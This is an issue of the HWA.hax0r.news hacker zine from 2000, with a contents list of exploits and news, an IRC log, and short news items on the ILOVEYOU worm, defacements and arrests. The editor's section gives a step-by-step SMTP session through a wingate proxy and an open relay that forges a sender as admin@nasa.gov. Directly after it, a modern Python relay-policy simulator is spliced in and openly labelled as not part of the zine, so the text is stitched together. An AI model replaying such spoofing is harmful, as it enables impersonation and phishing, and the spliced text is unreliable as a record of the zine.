Subjected to Social Engineering 241.0 .. [HNN] Jun 30'00 ZDNet Launches Echelon Study 242.0 .. 
[HNN] Jun 30'00 Interpol and Atomic Tangerine Announce Collaboration 243.0 .. [HNN] Jun 30'00 Survey Results Show That Precautions Lag Concerns 244.0 .. [HNN] Jun 30'00 Student Confesses to Numerous Private and Government Attacks 245.0 .. [HNN] Jun 30'00 Threat From Russia? 246.0 .. [HNN] Jun 30'00 Zines Update 247.0 .. [IND] May 26th: Lights Out 248.0 .. [IND] May 30th Anti-Metallica Hackers Hit DC Metro Web Site 249.0 .. [IND] June 1st Hackers Drawn By The Thrills, The Challenge or Just Plain Cash 250.0 .. [IND] Web Hijackers Pilfer Internet Domain Names 251.0 .. [IND] High-Tech Crooks Thrive in Russia 252.0 .. [TXT] Treatise: "Why EFnet Sucks." by: Anonoymous Whiner 253.0 .. [HWA] Honeypots: who's fooling who? 254.0 .. [IND] Hacking Away At Government 255.0 .. [IND] Default passwords list 256.0 .. [IND] Security Firm To List Additional Hacking Threats 257.0 .. [IND] SANS: Top 10 hacker targets 258.0 .. [0x4] Justin Tanner aka Agent Steal in amazing plot escapes again. 259.0 .. [IND] Peeping Through Port 139 260.0 .. [IND] Hacker Hits Road Runner Server; 261.0 .. [IND] Swedish Hacker-Tracker Is FBI And Media Darling 262.0 .. [IND] Hackers Force HK Government Website to Shut Down Again 263.0 .. [IND] Dozens of Malaysian Political Web Sites Hacked 264.0 .. [IND] Youth Nabbed in Singapore for Hacking in Australia 265.0 .. [IND] Facing a Man’s World:Female Hackers Battle Sexism to Get Ahead 266.0 .. [IND] Social study: staunch religious hackers? 267.0 .. [IND] Ex-KGB Major Leads US War Against Hackers 268.0 .. [IND] Flagship Hong Kong Govt Web Site Defaced, Twice 269.0 .. [IND] Modest Teenager Is FBI's Secret Weapon In War Against Cyber Crime 270.0 .. [IND] Daemons on the Net:Stereotyping the hacker ** 271.0 .. [IND] China: Defiant Cyber Surfers Play Cat-and-Mouse Game 272.0 .. [IND] Hacker's Humorous Tips to Websites 273.0 .. [IND] r00tfest 2000: Computer Hackers Ride into Town Today 274.0 .. [IND] UK Watchdog Warns Net Banks Over Hackers 275.0 .. 
[IND] Hacker Attacks Gun Control Group's Web Site 276.0 .. [IND] Hackers Attack Nike, United Arab Emirates Sites 277.0 .. [IND] Rock Band's Answer To Napster: Sabotage 278.0 .. [IND] Pro-gun Hackers Take Over Web Site 279.0 .. [IND] Hacker Taps Into 24,000 Credit Cards 280.0 .. [IND] Etisalat Vows to Prosecute Internet Hackers 281.0 .. [IND] Foundstone's Ultimate Hacking Course Available at Black Hat Briefings 282.0 .. [IND] Student Admits Hacking U.S. Government Computers 283.0 .. [IND] Hacker may have endangered astronauts 284.0 .. [IND] July 2000: Accused UAE Hacker Files Defamation Lawsuit 285.0 .. [IND] July 2000: NASA Denies Hacker Attack Danger 286.0 .. [IND] July 2000: 'Houston, We Don't Have A Problem.' 287.0 .. [IND] July 2000: Crackers are Common Criminals 288.0 .. [IND] May 2000: Black Hat Briefings -Singapore, May 2000 289.0 .. [IND] FBI Investigating Qualcomm Hacker 290.0 .. [IND] Lloyd's Offers Hacker Insurance 291.0 .. [MM] Man charged with breaking into NASA computers 292.0 .. [MM] The FBI's Carnivore(s) Initiative (More big brother) 293.0 .. [IND] Forbidden Knowledge calls it quits. 294.0 .. [b0f] Lamagra's "roothat" hacker wargames, hack legally! 295.0 .. [HWA] Out of the quagmire, something interesting emerges: b10z crew 296.0 .. [MM] Cnet:AltaVista credits players $1 after contest error 297.0 .. [HWA] Securax "socksploitation" tutorial 298.0 .. [IND] Hacktivism: Hacktivismo with cDc 299.0 .. [IND] Hacktivism: GForce using website defacements to spread their word 300.0 .. [HNS] Help Net Security News Letter #20 301.0 .. [MM] NAPSTER GETS ORDERED TO BE SHUT DOWN IS THE FIGHT LOST? 302.0 .. [IND] Paper: Know your enemy #1 by Lance Spitzner 303.0 .. [IND] Paper: Know your enemy #2 by Lance Spitzner 304.0 .. [IND] Paper: Know your enemy #3: Forensic Analysis by Lance Spitzner 305.0 .. [IND] Paper: Know your enemy #4 by Lance Spitzner : The motives 306.0 .. [IND] Support docs and logs from the Know your enemy papers 307.0 .. 
[IND] Trinoo DDoS Analysis 308.0 .. [IND] Remote root exploit HOW-TO by E-mind 309.0 .. [IND] Paper: Armoring Linux by Lance Spitzner (July 28th 2000) 310.0 .. [IND] Paper: Tracking Hackers On Irc by Theory Group 311.0 .. [IND] More spies in the wires..software that snoops on you and more. 312.0 .. [IND] Why Linux sucks. 313.0 .. [IND] Article submission on 'Social Engineering' by tekneke 314.0 .. [IBT] Ethics & The Underground, What the hell happened? - Gh0zt 315.0 .. [IND] PCFS.C by Mixter 316.0 .. [IND] The hypocrisy runs rampant: prizm, mr anti-defacement himself, defaces? 317.0 .. [MM] Do you have an imaginary friend? no? are you sure?? 318.0 .. [HWA] What ever happened to .... 7thSphere? 319.0 .. [IND] Study Shows: FBI Alienates Industry Security Experts 320.0 .. [HWA] Silly IRC logs for your amusement and edufication 321.0 .. [HWA] The strange case of Cruci's birthday dog 322.0 .. [HWA] Interview: Herbless mass defacer in limelight recently by PhantasmP 323.0 .. [HWA] Interview with Pimpshiz in limelight recently by SugarKing 324.0 .. [HWA] BS interview with DeC who hosed us but it was mildly amusing..by Cruciphux 325.0 .. [HWA] Interview: Mixter by Cruciphux (NOT SugarKing) 326.0 .. [HWA] Interview: back to business, political hackers GForce by SugarKing 327.0 .. [HWA] Interview: Ph33r the B33r by SugarKing 327.1 .. [HWA] Interview: BeC some oldskewl muscle makes some noise.(additional feature) 328.0 .. [HWA] Release: eth0 releases sscan2k-pre6 scanner 329.0 .. [HWA] Release: WhiteRuss w00p local BFTPD exploit PoC 330.0 .. [HWA] Release: xitami.c DoS by forrest 331.0 .. [HWA] Release: unicode M$ hack similar to those seen used recently by: Grazer 332.0 .. [HWA] Release: Hlds Half life server vuln by csh ** 333.0 .. [HWA] Release: trans0ft brokerftp vuln by eth0 334.0 .. [HWA] Release: Grazer releases R2D2 dos 335.0 .. [HWA] The Bind P3 exploit revealed. 336.0 .. [HWA] Darknet.hwa-security.net Mirror opens 337.0 .. [IND] from the didn't they die? 
files: genocide2600.com oldskewl revisited 338.0 .. [HWA] Nov 2000: The day efnet nearly died, The ShadowKnight and Mafiaboy crusade 339.0 .. [IND] Nov 2000: Arab Hackers Hit U.S. Firm for Israeli Ties 340.0 .. [HWA] Nov 2000: HOTNEW at time of print, mass hack/dos of gaming sites 341.0 .. [IND] Nov 2000: Paranoia Vs. Transparency And Their Effects On Internet Security 342.0 .. [IND] Nov 2000: Trouble in the Holy land, Cyberwar and the Israeli Underground's Press Release. 343.0 .. [IND] Nov 2000: NOCPulse and ISS warn of impending DDoS attacks this Christmas 344.0 .. [IND] Oct 2000: Carnivore does more than previously thought 345.0 .. [IND] Nov 2000: Surprise! RSA releases crypto patent ahead of schedule 346.0 .. [IND] Nov 2000: Hackers: The millennial scapegoats? 347.0 .. [IND] Nov 2000: Student Arrested in Emulex Hoax Case 348.0 .. [EXP] Nov 2000: 0Day (yeah sure) exploit for WuFTPD < 2.6.1 fx9.c .. [HWA] Hidden tracks #57 is in progress with current news/exploits and releases, no due date projected at this time. - Cruci =-------------------------------------------------------------------------= AD.S .. Post your site ads or etc here, if you can offer something in return thats tres cool, if not we'll consider ur ad anyways so send it in.ads for other zines are ok too btw just mention us in yours, please remember to include links and an email contact. Ha.Ha .. Humour and puzzles ............................................ Oi! laddie! send in humour for this section! I need a laugh and its hard to find good stuff... ;)........................... SITE.1 .. Featured site, ................................................. H.W .. Hacked Websites ............................................... A.0 .. APPENDICES...................................................... * COMMON TROJAN PORTS LISTING..................................... A.1 .. PHACVW linx and references...................................... A.2 .. 
Hot Hits (.gov and .mil + other interesting traffic on our site) A.3 .. Mirror Sites list............................................... A.4 .. The Hacker's Ethic 90's Style.................................. A.5 .. Sources........................................................ A.6 .. Resources...................................................... A.7 .. Submission information......................................... A.8 .. Mailing lists information...................................... A.9 .. Whats in a name? why HWA.hax0r.news??.......................... A.10 .. HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again). A.11 .. Underground and (security?) Zines.............................. * Feb 2000 moved opening data to appendices, A.2 through A.10, probably more to be added. Quicker to get to the news, and info etc... - Ed =--------------------------------------------------------------------------= @HWA'99, 2000 00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= _ _ | | ___ __ _ __ _| | | | / _ \/ _` |/ _` | | | |__| __/ (_| | (_| | | |_____\___|\__, |\__,_|_| |___/ THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ). Important semi-legalese and license to redistribute: YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. 
LINKS ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is http://welcome.to/HWA.hax0r.news IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL ME PRIVATELY current email cruciphux@dok.org THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS: I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND REDISTRIBUTE/MIRROR. - EoD ** USE NO HOOKS ** Although this file and all future issues are now copyright, some of the content holds its own copyright and these are printed and respected. News is news so I'll print any and all news but will quote sources when the source is known, if it's good enough for CNN it's good enough for me. And I'm doing it for free on my own time so pfffft. :) No monies are made or sought through the distribution of this material. If you have a problem or concern email me and we'll discuss it. HWA (Hackers Without Attitudes) is not affiliated with HWA (Hewlitts Warez Archive?), and does not condone 'warez' in any shape manner or form, unless they're good, fresh 0-day and on a fast site. HWA.hax0r.news is now officially sponsored by the following entities: HWA Internet Security http://hwa-security.net/ CubeSoft Communications http://www.csoft.net/ We strongly suggest Csoft for your hosting needs, tell them cruciphux from HWA sent you. contact julien@csoft.net for details and check the site for plans available. Rights of sources included in our newsletter/zine ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Some sources and agencies impose unfair limitations and restrictions on the use of their data, I do not generally ask permission to include the articles from major media or other persons that have published material on the net, imho this material is public domain. 
Example: "This material is subject to copyright and any unauthorised use, copying or mirroring is prohibited. " This notice will be disregarded we don't charge for access to these archives, if anything we're doing the site(s) a favour by disseminating their news. Legal action will result in a civil disobedience action and will incur underground continuance of our zine. cruciphux@dok.org Cruciphux [C*:.] HWA/DoK Since 1989 00.1 CONTACT INFORMATION AND MAIL DROP =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ____ _ _ / ___|___ _ __ | |_ __ _ ___| |_ ___ | | / _ \| '_ \| __/ _` |/ __| __/ __| | |__| (_) | | | | || (_| | (__| |_\__ \ \____\___/|_| |_|\__\__,_|\___|\__|___/ Wahoo, we now have a mail-drop, if you are outside of the U.S.A or Canada / North America (hell even if you are inside ..) and wish to send printed matter like newspaper clippings a subscription to your cool foreign hacking zine or photos, small non-explosive packages or sensitive information etc etc well, now you can. (w00t) please no more inflatable sheep or plastic dog droppings, or fake vomit thanks. Send all goodies to: Address changed from: X HWA NEWS X P.O BOX 44118 X 370 MAIN ST. NORTH X BRAMPTON, ONTARIO X CANADA X L6V 4H5 to: HWA P.O BOX 44118 POSTAL OUTLET UNIT #9 ONE WEXFORD ROAD BRAMPTON, ONTARIO CANADA L6Z 4V7 WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you ~~~~~~~ are reading this from some interesting places, make my day and get a mention in the zine, send in a postcard, I realize that some places it is cost prohibitive but if you have the time and money be a cool dude / gal and send a poor guy a postcard preferably one that has some scenery from your place of residence for my collection, I collect stamps too so you kill two birds with one stone by being cool and mailing in a postcard, return address not necessary, just a "hey guys being cool in Bahrain, take it easy" will do ... ;-) thanx. 
Ideas for interesting 'stuff' to send in apart from news:

- Photo copies of old system manual front pages (optionally signed by you)
- Photos of yourself, your mom, sister, dog and or cat in a NON compromising position plz I don't want pr0n.
- Picture postcards
- CD's, 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250 tapes with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone fun or social engineering examples or transcripts thereof.

Stuff you can email:

- Prank phone calls in .ram or .mp* format
- Fone tones and security announcements from PBX's etc
- fun shit you sampled off yer scanner
- reserved for one smiley face -> :-) <-
- PHACV lists of files that you have or phac cd's you own (we have a burner)
- burns of phac cds (email first to make sure we don't already have em)
- Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc

If you still can't think of anything you're probably not that interesting a person after all so don't worry about it

Our current email:

Submissions/zine gossip.....: cruciphux@dok.org
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas2@usa.net

Other methods:

Cruciphux's ICQ: 58303688 note; not always online, and do not abuse or use for lame questions!

My preferred chat method: IRC Efnet in #hwa-security or #HWA.hax0r.news

@HWA

00.2 WHO ARE WE AND WHY?
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

"The number one use of NT servers on the internet today is definitely that of the web defacement artist" - Gallop poll May 2000

We have definitely evolved since 1998, we now have a second website with dynamic news content and a fresh kicking new layout soon to be implemented and also a killer coding team working on security vulnerabilities, exploits and auditing software and building new tools. 
Watch us closely over time as we grow and produce some worthwhile product for the compsec/(and also indirectly) underground contingent of the hacking scene.

http://hwa-security.net/about.html
http://hwa-security.net/contact.html

@HWA

01.0 Greets!?!?!

____ _ / ___|_ __ ___ ___| |_ ___ | | _| '__/ _ \/ _ \ __/ __| | |_| | | | __/ __/ |_\__ \ \____|_| \___|\___|\__|___/

Thanks to all in the community for their support and interest but I'd like to see more reader input, help me out here, what's good, what sucks etc, not that I guarantee I'll take any notice mind you, but send in your thoughts anyway.

GREETS
~~~~~~

Hi m0m! All HWA members and new inductees, people that filled out jobs.php and are still on the waiting list... #hwa-security, #hwa.hax0r.news etc

DISSES?
~~~~~~~

You get the biggest dis of them all, your name(s) will not even be mentioned here in the zine, you are nothing. You know who you are, deal and squeal.

EoF

01.1 Last minute stuff, rumours and newsbytes

_ _ ____ _ | \ | | _____ _____| __ ) _ _| |_ ___ ___ | \| |/ _ \ \ /\ / / __| _ \| | | | __/ _ Y __| | |\ | __/\ V V /\__ \ |_) | |_| | || __|__ \ |_| \_|\___| \_/\_/ |___/____/ \__, |\__\___|___/ |___/
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

SECTION DELETED

@HWA

01.2 MAILBAG - email and posts from the message board worthy of a read

SECTION DELETED

@HWA

02.0 Words from the editor.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
_____ _ _ _ _ | ____|__| (_) |_ ___ _ __( )__ | _| / _` | | __/ _ \| '__|/ __| | |__| (_| | | || (_) | | \__ \ ___|_____\__,_|_|\__\___/|_| |___/ / ___| ___ __ _ _ __ | |__ _____ __ \___ \ / _ \ / _` | '_ \| '_ \ / _ \ \/ / ___) | (_) | (_| | |_) | |_) | (_) > < |____/ \___/ \__,_| .__/|_.__/ \___/_/\_\ |_|
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

#include <stdio.h>

int main(void)
{
    printf ("Read commented source!\n\n");

    /* Well, I broke the rules again, yeah ... decided it was time
     * to re-setup my system and overhaul my production box, well
     * naturally I forgot to back up a few things including several
     * email folders and .. the bulk of this issue (#54) so ... it
     * is inevitable that this issue is unfortunately incomplete at
     * best.
     *
     * If you submitted articles etc for this issue and they did not
     * appear please kindly resend them and i'll include in the next
     * release, apologies to all.
     *
     * Cruci-
     *
     * cruciphux@dok.org
     */

    printf ("EoF.\n");
    return 0;
}

Anonymous email:

telnet (wingate ip) (see our proxies list)
Wingate>0.0.0.0
Trying 0.0.0.0...
Connected to target.host.edu
Escape character is '^]'.
220 target.host.edu ESMTP Sendmail 8.9.3/8.9.3; Sun, 6 Feb 2000 17:21:00 -0500 (EST)
HELO bogus.com
250 target.host.edu Hello ~ereet@target.host.edu [ 0.0.0.0 ], pleased to meet you
MAIL FROM: admin@nasa.gov
250 admin@nasa.gov... Sender ok
RCPT TO: cruciphux@dok.org
250 cruciphux@dok.org... Recipient ok
DATA
Secret cool infoz
.
QUIT

If you got that far everything is probably ok, otherwise you might see

550 cruciphux@dok.org... Relaying denied

or

550 admin@nasa.gov... Domain must exist

etc.

* This won't work on a server with up-to-date rule sets denying relaying, and your attempts will be logged (note that the server's HELO reply already records the connecting address, so the bogus HELO name buys you no anonymity), so we don't suggest you actually use this method to reach us; it's probably also illegal (theft of service) so, don't do it. 
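The dialogue above is the whole open-relay test: a server that answers "250 ... Recipient ok" for a recipient it does not deliver for, from a client it does not trust, will relay for anyone; a correctly configured one answers "550 ... Relaying denied" (and the banner shows Sendmail 8.9.3, which denies relaying by default, so the 550 is what you should expect unless the admin opened it up). The following is an added example, not code from the zine or from Sendmail: a toy Python command handler that applies that relay policy to the exact session in the text, once as an open relay and once with relaying restricted. The local-domain list, the "internal" network, the stand-in for the sender-domain DNS check and the log line format are all assumed values chosen for the demonstration.

```python
"""Toy SMTP relay-policy check for the open-relay dialogue in the text.

Added example, not part of the zine.  Domain lists and networks below are
assumed values chosen for the demonstration.
"""
import ipaddress

LOCAL_DOMAINS = {"target.host.edu"}                      # assumed: we deliver for these
RELAY_NETWORKS = [ipaddress.ip_network("10.0.0.0/8")]    # assumed: internal clients may relay
RESOLVABLE = {"target.host.edu", "nasa.gov", "dok.org", "bogus.com"}  # assumed: stands in for DNS


def _address(arg):
    """'FROM: <a@b>' or 'TO: a@b' -> 'a@b'."""
    return arg.split(":", 1)[1].strip().strip("<>")


class SmtpPolicy:
    """Minimal sendmail-style command handler that applies a relay policy."""

    def __init__(self, client_ip, open_relay=False):
        self.client_ip = ipaddress.ip_address(client_ip)
        self.open_relay = open_relay      # True reproduces the pre-8.9 "relay for anyone" default
        self.recipients = []
        self.in_data = False
        self.log = []                     # what the admin would see in the maillog

    def _client_may_relay(self):
        return self.open_relay or any(self.client_ip in net for net in RELAY_NETWORKS)

    def handle(self, line):
        """Return the server reply for one client line (None while reading the body)."""
        if self.in_data:
            if line == ".":
                self.in_data = False
                return "250 Message accepted for delivery"
            return None
        cmd, _, arg = line.partition(" ")
        cmd = cmd.upper()
        if cmd == "HELO":
            # The reply records the real peer address regardless of the claimed name.
            return f"250 target.host.edu Hello {arg} [{self.client_ip}], pleased to meet you"
        if cmd == "MAIL":
            sender = _address(arg)
            if sender.rpartition("@")[2] not in RESOLVABLE:
                return f"550 {sender}... Domain must exist"
            return f"250 {sender}... Sender ok"
        if cmd == "RCPT":
            rcpt = _address(arg)
            # Relay decision: local recipient, or a client we trust to relay through us.
            if rcpt.rpartition("@")[2] in LOCAL_DOMAINS or self._client_may_relay():
                self.recipients.append(rcpt)
                return f"250 {rcpt}... Recipient ok"
            self.log.append(f"ruleset=check_rcpt, relay=[{self.client_ip}], "
                            f"arg1=<{rcpt}>, reject=550 Relaying denied")
            return f"550 {rcpt}... Relaying denied"
        if cmd == "DATA":
            if not self.recipients:
                return "503 Need RCPT (recipient)"
            self.in_data = True
            return '354 Enter mail, end with "." on a line by itself'
        if cmd == "QUIT":
            return "221 target.host.edu closing connection"
        return "500 Command unrecognized"


# Constructed dialogue, copied from the session in the text.
SESSION = [
    "HELO bogus.com",
    "MAIL FROM: admin@nasa.gov",
    "RCPT TO: cruciphux@dok.org",
    "DATA",
    "Secret cool infoz",
    ".",
    "QUIT",
]


def run_session(lines, client_ip, open_relay=False):
    """Feed the dialogue through the policy; return (replies, log)."""
    srv = SmtpPolicy(client_ip, open_relay)
    replies = [r for r in (srv.handle(l) for l in lines) if r is not None]
    return replies, srv.log


if __name__ == "__main__":
    for mode in (True, False):
        print(f"--- open_relay={mode}")
        for r in run_session(SESSION, "192.0.2.10", open_relay=mode)[0]:
            print(r)
```

With relaying restricted the RCPT is refused, the DATA that follows gets a 503 because no recipient was accepted, and the refusal leaves a log entry naming the connecting address; the same dialogue from an address inside the assumed internal network is accepted, which is the hole to look for when auditing a relay policy.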
;-) =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -= start =--= start =--= start =--= start =--= start =--= start =--= start =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ____ _ _ / ___|___ _ __ | |_ ___ _ __ | |_ | | / _ \| '_ \| __/ _ \ '_ \| __| | |__| (_) | | | | || __/ | | | |_ \____\___/|_| |_|\__\___|_| |_|\__| / ___|| |_ __ _ _ __| |_ \___ \| __/ _` | '__| __| ___) | || (_| | | | |_ |____/ \__\__,_|_| \__| =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -= start =--= start =--= start =--= start =--= start =--= start =--= start =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ".. since we incorporated, we can proudly say,'Now with 20% more shit!'" =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= In the land of the snivelling wotsits lay the honourable creed musers ... #fuckmedead [15:36] hrmm [15:37] dont want to go over there (pointing to office with Don, Ralph and Norman) [15:38] c'mon ask me why [15:38] damnit [15:38] why [15:38] computer talk!?!? [15:38] no, they're talking about pornos [15:38] rofl [15:38] ugh [15:39] "fuck pornos" [15:39] hey thats a quotable quote [15:39] heh [15:40] S.A.U.N.A. [15:40] you too can now own your own ANUSTICK (c) [15:40] Society Against the Use of Needless Acronyms [15:41] "hey bob, is that a stick up your ass?" [15:41] haha [15:41] "Why, yes it is!" [15:41] thats (c)(tm)(r) me [15:42] get your very own ANUSTICK for only $19.95 ... 
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-= start =--= start =--= start =--= start =--= start =--= start =--=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

03.0 [HNN] May 09'00 ILOVEYOU Investigation Continues
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by Lots of people

Experts Say Police Got Wrong Suspects

Two computer virus experts have come forward and said that they do not believe that the couple in Manila currently under investigation for their role in the ILOVEYOU virus/worm are in fact the authors of the code. James Atkinson of the Granite Island Group believes that the true author is Anjabi, a 15 to 17 year old girl who lives near the current suspects.

Wired

Suspect Ordered Released

The 27-year-old bank employee who was arrested in connection with the ILOVEYOU virus/worm has been released. Reonel Ramones had been arrested and charged with violating the Access Devices Regulation Act. Police, however, have not been able to compile enough evidence to hold him, forcing them to let him go pending the collection of more evidence. He will still be required to appear in court on May 19 to answer the preliminary charges.

Reuters - via Yahoo

Manila Police Now Looking for 10 Suspects

Philippine police said that they are now looking for up to ten people who may have had access to computers at the AMA Computer College. The couple currently under investigation attended the college in the past.

Reuters - via Yahoo

http://www.wired.com/news/politics/0,1283,36203,00.html
http://dailynews.yahoo.com/h/nm/20000509/ts/virus_philippines_13.html
http://dailynews.yahoo.com/h/nm/20000509/ts/virus_philippines_10.html

----------

04.0 [HNN] May 09'00 Brace Yourselves For the SuperVirus
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by William Knowles

While this article is sensationalistic, full of hype and FUD, it does make an important point.
ILOVEYOU was not as bad as it could have been. Just think if it had been targeted against other types of files, .exe for instance. Or if it had been auto-executing, with no user intervention required?

London Observer
http://shns.scripps.com/shns/story.cfm?pk

----------

05.0 [HNN] May 09'00 NIPC Accused of Dragging Feet
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by Brian

The National Infrastructure Protection Center was criticized for overreacting to the recent 911 virus, which had minimal impact, and is now being criticized again for not reacting strongly enough to ILOVEYOU. Sen. Robert Bennett, R-Utah, wants to investigate whether NIPC's response was quick enough.

Newsbytes
NIPC - Latest Advisory
http://www.newsbytes.com/pubNews/00/148613.html
http://www.nipc.gov/nipc/alert00-041e.htm

@HWA

06.0 [HNN] May 09'00 Classified Systems Hit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by Evil Wench

ILOVEYOU somehow managed to jump the air gap and infected at least four Department of Defense classified systems. DoD said that the infection was quickly quarantined and that the Joint Task Force on Computer Network Defense will be investigating how the classified systems became infected.

Government Executive Magazine
http://www.govexec.com/dailyfed/0500/050800j1.htm

@HWA

07.0 [HNN] May 09'00 Mitnick in Online Chat
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by apocalyse

Despite being banned from touching a computer or anything connected to the Internet for three years, Kevin Mitnick was able to participate in an online chat with ABC News. The topic of discussion was of course the ILOVEYOU virus/worm.

ABC News
http://abcnews.go.com/sections/tech/DailyNews/chat_000508mitnick.html

@HWA

08.0 [HNN] May 09'00 Phreakers In the White House
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by major

The FBI is conducting an investigation into whether the White House phone system has been breached.
The breach may have involved the "real time" interception of telephone conversations. The FBI has been investigating Amdocs, a Chesterfield, Mo., telecommunications billing company that assisted Bell Atlantic with installing telephone lines at the White House in 1997. The FBI has tried to get an arrest warrant for a suspect; however, a senior law enforcement official told Fox News that "to suggest that the phones at the White House have been penetrated is not supported by the facts."

Fox News
http://www.foxnews.com/national/050500/phonebreach.sml

@HWA

09.0 [HNN] May 09'00 MS vs Netscape in Blame for Security Hole
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by acopolyse

Microsoft and Netscape Communications are pointing fingers at each other over a browser-related security problem that neither company has any intention of fixing. (Do I have to say more?)

C|Net
http://news.cnet.com/news/0-1005-200-1820959.html?tag

@HWA

10.0 [HNN] May 09'00 Hacker vs. Cracker The Debate Continues
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by Weld Pond

Blair Shewchuk, a journalist with the Canadian Broadcasting Corporation, has published a really good treatise on why media outlets continue to use the word 'hacker' instead of 'cracker' or some other alternative. While he may be correct that you cannot force people to use different words or change their meanings in the dictionary, you can send a hell of a lot of emails. (Personally we prefer the word attacker or criminal, much less confusion with that.)

Canadian Broadcasting Corporation
http://cbc.ca/news/indepth/words/hack.html

@HWA

11.0 [HNN] May 10'00 Buffer Overflow: The Name Game: Groking the Love Bug
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by McIntyre

The media frenzy surrounding the ILOVEYOU or 'Love Bug' virus/worm has resulted in several contradictions within the press.
Even the National Bureau of Investigation can't seem to get its facts straight. Things like names, relationships, and damage estimates would seem to be pretty standard and easy things to report on, or are they? McIntyre takes a look at these questions and more in the latest article in the Buffer Overflow.

Buffer Overflow

@HWA

12.0 [HNN] May 10'00 New Virus/Worm On The Loose, Friendmess.A
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by Space Rogue

While based on ILOVEYOU, Friendmess.A is different enough to be considered a separate entity and not a variant. After infecting a machine, Friendmess will delete files from the Windows directory, including Windows/System and Windows/Temp. While the danger from Friendmess is high, it is not spreading as fast as ILOVEYOU.

ZD Net
http://www.zdnet.com/zdhelp/stories/main/0,5594,2566037,00.html

@HWA

13.0 [HNN] May 10'00 YTCracker Busted For Web Defacement
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by ytcracker

YTCracker has been arrested and charged with one count each of computer crime and criminal mischief for defacing the web site of the city of Colorado Springs last October. The two felony charges carry a maximum penalty of two years of juvenile detention.

The Gazette
Attrition.org - Mirrors of YTCracker's Defacements
http://www.gazette.com/daily/top3.html
http://www.attrition.org/mirror/attrition/ytcracker.html

@HWA

14.0 [HNN] May 10'00 Gov Security Laws Introduced At Summit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by William Knowles

